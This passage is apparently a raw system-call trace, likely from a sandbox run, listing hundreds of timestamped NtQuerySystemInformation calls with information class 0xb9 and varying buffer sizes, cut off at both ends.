ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0272.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0272.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0272.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0272.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0272.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0272.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0272.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0272.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc590, Length=0x28, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc610, Length=0x28, ResultLength=0x0) [0272.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc610, Length=0x28, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc4b0, Length=0x20, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc570, Length=0x20, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc500, Length=0x20, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc500, Length=0x20, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x28, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x28, ResultLength=0x0) [0272.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] 